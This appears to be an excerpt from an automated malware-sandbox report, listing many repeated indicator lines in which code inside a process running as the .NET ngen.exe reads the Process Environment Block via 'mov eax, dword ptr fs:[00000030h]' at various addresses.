            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059535D7 mov eax, dword ptr fs:[00000030h]4_2_059535D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BE5CF mov eax, dword ptr fs:[00000030h]4_2_058BE5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BE5CF mov eax, dword ptr fs:[00000030h]4_2_058BE5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B55C0 mov eax, dword ptr fs:[00000030h]4_2_058B55C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A95DA mov eax, dword ptr fs:[00000030h]4_2_058A95DA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058865D0 mov eax, dword ptr fs:[00000030h]4_2_058865D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BA5D0 mov eax, dword ptr fs:[00000030h]4_2_058BA5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BA5D0 mov eax, dword ptr fs:[00000030h]4_2_058BA5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059555C9 mov eax, dword ptr fs:[00000030h]4_2_059555C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FD5D0 mov eax, dword ptr fs:[00000030h]4_2_058FD5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FD5D0 mov ecx, dword ptr fs:[00000030h]4_2_058FD5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BC5ED mov eax, dword ptr fs:[00000030h]4_2_058BC5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BC5ED mov eax, dword ptr fs:[00000030h]4_2_058BC5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058825E0 mov eax, dword ptr fs:[00000030h]4_2_058825E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h]4_2_058AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h]4_2_058AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h]4_2_058AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h]4_2_058AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h]4_2_058AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h]4_2_058AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h]4_2_058AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE5E7 mov eax, dword ptr fs:[00000030h]4_2_058AE5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A15F4 mov eax, dword ptr fs:[00000030h]4_2_058A15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A15F4 mov eax, dword ptr fs:[00000030h]4_2_058A15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A15F4 mov eax, dword ptr fs:[00000030h]4_2_058A15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A15F4 mov eax, dword ptr fs:[00000030h]4_2_058A15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A15F4 mov eax, dword ptr fs:[00000030h]4_2_058A15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A15F4 mov eax, dword ptr fs:[00000030h]4_2_058A15F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B7505 mov eax, dword ptr fs:[00000030h]4_2_058B7505
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B7505 mov ecx, dword ptr fs:[00000030h]4_2_058B7505
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05954500 mov eax, dword ptr fs:[00000030h]4_2_05954500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05954500 mov eax, dword ptr fs:[00000030h]4_2_05954500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05954500 mov eax, dword ptr fs:[00000030h]4_2_05954500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05954500 mov eax, dword ptr fs:[00000030h]4_2_05954500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05954500 mov eax, dword ptr fs:[00000030h]4_2_05954500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05954500 mov eax, dword ptr fs:[00000030h]4_2_05954500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05954500 mov eax, dword ptr fs:[00000030h]4_2_05954500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05955537 mov eax, dword ptr fs:[00000030h]4_2_05955537
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE53E mov eax, dword ptr fs:[00000030h]4_2_058AE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE53E mov eax, dword ptr fs:[00000030h]4_2_058AE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE53E mov eax, dword ptr fs:[00000030h]4_2_058AE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE53E mov eax, dword ptr fs:[00000030h]4_2_058AE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE53E mov eax, dword ptr fs:[00000030h]4_2_058AE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592F525 mov eax, dword ptr fs:[00000030h]4_2_0592F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592F525 mov eax, dword ptr fs:[00000030h]4_2_0592F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592F525 mov eax, dword ptr fs:[00000030h]4_2_0592F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592F525 mov eax, dword ptr fs:[00000030h]4_2_0592F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592F525 mov eax, dword ptr fs:[00000030h]4_2_0592F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592F525 mov eax, dword ptr fs:[00000030h]4_2_0592F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592F525 mov eax, dword ptr fs:[00000030h]4_2_0592F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BD530 mov eax, dword ptr fs:[00000030h]4_2_058BD530
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BD530 mov eax, dword ptr fs:[00000030h]4_2_058BD530
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890535 mov eax, dword ptr fs:[00000030h]4_2_05890535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890535 mov eax, dword ptr fs:[00000030h]4_2_05890535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890535 mov eax, dword ptr fs:[00000030h]4_2_05890535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890535 mov eax, dword ptr fs:[00000030h]4_2_05890535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890535 mov eax, dword ptr fs:[00000030h]4_2_05890535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890535 mov eax, dword ptr fs:[00000030h]4_2_05890535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0593B52F mov eax, dword ptr fs:[00000030h]4_2_0593B52F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588D534 mov eax, dword ptr fs:[00000030h]4_2_0588D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588D534 mov eax, dword ptr fs:[00000030h]4_2_0588D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588D534 mov eax, dword ptr fs:[00000030h]4_2_0588D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588D534 mov eax, dword ptr fs:[00000030h]4_2_0588D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588D534 mov eax, dword ptr fs:[00000030h]4_2_0588D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588D534 mov eax, dword ptr fs:[00000030h]4_2_0588D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05888550 mov eax, dword ptr fs:[00000030h]4_2_05888550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05888550 mov eax, dword ptr fs:[00000030h]4_2_05888550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B656A mov eax, dword ptr fs:[00000030h]4_2_058B656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B656A mov eax, dword ptr fs:[00000030h]4_2_058B656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B656A mov eax, dword ptr fs:[00000030h]4_2_058B656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587B562 mov eax, dword ptr fs:[00000030h]4_2_0587B562
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BB570 mov eax, dword ptr fs:[00000030h]4_2_058BB570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BB570 mov eax, dword ptr fs:[00000030h]4_2_058BB570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587B480 mov eax, dword ptr fs:[00000030h]4_2_0587B480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05889486 mov eax, dword ptr fs:[00000030h]4_2_05889486
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05889486 mov eax, dword ptr fs:[00000030h]4_2_05889486
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0590A4B0 mov eax, dword ptr fs:[00000030h]4_2_0590A4B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058864AB mov eax, dword ptr fs:[00000030h]4_2_058864AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B34B0 mov eax, dword ptr fs:[00000030h]4_2_058B34B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B44B0 mov ecx, dword ptr fs:[00000030h]4_2_058B44B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059554DB mov eax, dword ptr fs:[00000030h]4_2_059554DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058804E5 mov ecx, dword ptr fs:[00000030h]4_2_058804E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059294E0 mov eax, dword ptr fs:[00000030h]4_2_059294E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A340D mov eax, dword ptr fs:[00000030h]4_2_058A340D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B8402 mov eax, dword ptr fs:[00000030h]4_2_058B8402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B8402 mov eax, dword ptr fs:[00000030h]4_2_058B8402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B8402 mov eax, dword ptr fs:[00000030h]4_2_058B8402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587C427 mov eax, dword ptr fs:[00000030h]4_2_0587C427
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587E420 mov eax, dword ptr fs:[00000030h]4_2_0587E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587E420 mov eax, dword ptr fs:[00000030h]4_2_0587E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587E420 mov eax, dword ptr fs:[00000030h]4_2_0587E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BA430 mov eax, dword ptr fs:[00000030h]4_2_058BA430
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0593F453 mov eax, dword ptr fs:[00000030h]4_2_0593F453
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588B440 mov eax, dword ptr fs:[00000030h]4_2_0588B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588B440 mov eax, dword ptr fs:[00000030h]4_2_0588B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588B440 mov eax, dword ptr fs:[00000030h]4_2_0588B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588B440 mov eax, dword ptr fs:[00000030h]4_2_0588B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588B440 mov eax, dword ptr fs:[00000030h]4_2_0588B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588B440 mov eax, dword ptr fs:[00000030h]4_2_0588B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BE443 mov eax, dword ptr fs:[00000030h]4_2_058BE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BE443 mov eax, dword ptr fs:[00000030h]4_2_058BE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BE443 mov eax, dword ptr fs:[00000030h]4_2_058BE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BE443 mov eax, dword ptr fs:[00000030h]4_2_058BE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BE443 mov eax, dword ptr fs:[00000030h]4_2_058BE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BE443 mov eax, dword ptr fs:[00000030h]4_2_058BE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BE443 mov eax, dword ptr fs:[00000030h]4_2_058BE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BE443 mov eax, dword ptr fs:[00000030h]4_2_058BE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A245A mov eax, dword ptr fs:[00000030h]4_2_058A245A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587645D mov eax, dword ptr fs:[00000030h]4_2_0587645D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05881460 mov eax, dword ptr fs:[00000030h]4_2_05881460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05881460 mov eax, dword ptr fs:[00000030h]4_2_05881460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05881460 mov eax, dword ptr fs:[00000030h]4_2_05881460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05881460 mov eax, dword ptr fs:[00000030h]4_2_05881460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05881460 mov eax, dword ptr fs:[00000030h]4_2_05881460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589F460 mov eax, dword ptr fs:[00000030h]4_2_0589F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589F460 mov eax, dword ptr fs:[00000030h]4_2_0589F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589F460 mov eax, dword ptr fs:[00000030h]4_2_0589F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589F460 mov eax, dword ptr fs:[00000030h]4_2_0589F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589F460 mov eax, dword ptr fs:[00000030h]4_2_0589F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589F460 mov eax, dword ptr fs:[00000030h]4_2_0589F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0595547F mov eax, dword ptr fs:[00000030h]4_2_0595547F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AA470 mov eax, dword ptr fs:[00000030h]4_2_058AA470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AA470 mov eax, dword ptr fs:[00000030h]4_2_058AA470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AA470 mov eax, dword ptr fs:[00000030h]4_2_058AA470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0593F78A mov eax, dword ptr fs:[00000030h]4_2_0593F78A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059537B6 mov eax, dword ptr fs:[00000030h]4_2_059537B6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058807AF mov eax, dword ptr fs:[00000030h]4_2_058807AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059097A9 mov eax, dword ptr fs:[00000030h]4_2_059097A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AD7B0 mov eax, dword ptr fs:[00000030h]4_2_058AD7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F7BA mov eax, dword ptr fs:[00000030h]4_2_0587F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F7BA mov eax, dword ptr fs:[00000030h]4_2_0587F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F7BA mov eax, dword ptr fs:[00000030h]4_2_0587F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F7BA mov eax, dword ptr fs:[00000030h]4_2_0587F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F7BA mov eax, dword ptr fs:[00000030h]4_2_0587F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F7BA mov eax, dword ptr fs:[00000030h]4_2_0587F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F7BA mov eax, dword ptr fs:[00000030h]4_2_0587F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F7BA mov eax, dword ptr fs:[00000030h]4_2_0587F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F7BA mov eax, dword ptr fs:[00000030h]4_2_0587F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0590F7AF mov eax, dword ptr fs:[00000030h]4_2_0590F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0590F7AF mov eax, dword ptr fs:[00000030h]4_2_0590F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0590F7AF mov eax, dword ptr fs:[00000030h]4_2_0590F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0590F7AF mov eax, dword ptr fs:[00000030h]4_2_0590F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0590F7AF mov eax, dword ptr fs:[00000030h]4_2_0590F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588C7C0 mov eax, dword ptr fs:[00000030h]4_2_0588C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058857C0 mov eax, dword ptr fs:[00000030h]4_2_058857C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058857C0 mov eax, dword ptr fs:[00000030h]4_2_058857C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058857C0 mov eax, dword ptr fs:[00000030h]4_2_058857C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059007C3 mov eax, dword ptr fs:[00000030h]4_2_059007C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A27ED mov eax, dword ptr fs:[00000030h]4_2_058A27ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A27ED mov eax, dword ptr fs:[00000030h]4_2_058A27ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A27ED mov eax, dword ptr fs:[00000030h]4_2_058A27ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588D7E0 mov ecx, dword ptr fs:[00000030h]4_2_0588D7E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058847FB mov eax, dword ptr fs:[00000030h]4_2_058847FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058847FB mov eax, dword ptr fs:[00000030h]4_2_058847FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05885702 mov eax, dword ptr fs:[00000030h]4_2_05885702
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05885702 mov eax, dword ptr fs:[00000030h]4_2_05885702
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05887703 mov eax, dword ptr fs:[00000030h]4_2_05887703
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BC700 mov eax, dword ptr fs:[00000030h]4_2_058BC700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BF71F mov eax, dword ptr fs:[00000030h]4_2_058BF71F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BF71F mov eax, dword ptr fs:[00000030h]4_2_058BF71F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05880710 mov eax, dword ptr fs:[00000030h]4_2_05880710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B0710 mov eax, dword ptr fs:[00000030h]4_2_058B0710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05883720 mov eax, dword ptr fs:[00000030h]4_2_05883720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0595B73C mov eax, dword ptr fs:[00000030h]4_2_0595B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0595B73C mov eax, dword ptr fs:[00000030h]4_2_0595B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0595B73C mov eax, dword ptr fs:[00000030h]4_2_0595B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0595B73C mov eax, dword ptr fs:[00000030h]4_2_0595B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589F720 mov eax, dword ptr fs:[00000030h]4_2_0589F720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589F720 mov eax, dword ptr fs:[00000030h]4_2_0589F720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0589F720 mov eax, dword ptr fs:[00000030h]4_2_0589F720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BC720 mov eax, dword ptr fs:[00000030h]4_2_058BC720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BC720 mov eax, dword ptr fs:[00000030h]4_2_058BC720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588973A mov eax, dword ptr fs:[00000030h]4_2_0588973A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588973A mov eax, dword ptr fs:[00000030h]4_2_0588973A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B273C mov eax, dword ptr fs:[00000030h]4_2_058B273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B273C mov ecx, dword ptr fs:[00000030h]4_2_058B273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B273C mov eax, dword ptr fs:[00000030h]4_2_058B273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05879730 mov eax, dword ptr fs:[00000030h]4_2_05879730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05879730 mov eax, dword ptr fs:[00000030h]4_2_05879730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0593F72E mov eax, dword ptr fs:[00000030h]4_2_0593F72E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058FC730 mov eax, dword ptr fs:[00000030h]4_2_058FC730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0594972B mov eax, dword ptr fs:[00000030h]4_2_0594972B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B5734 mov eax, dword ptr fs:[00000030h]4_2_058B5734
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05904755 mov eax, dword ptr fs:[00000030h]4_2_05904755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B674D mov esi, dword ptr fs:[00000030h]4_2_058B674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B674D mov eax, dword ptr fs:[00000030h]4_2_058B674D
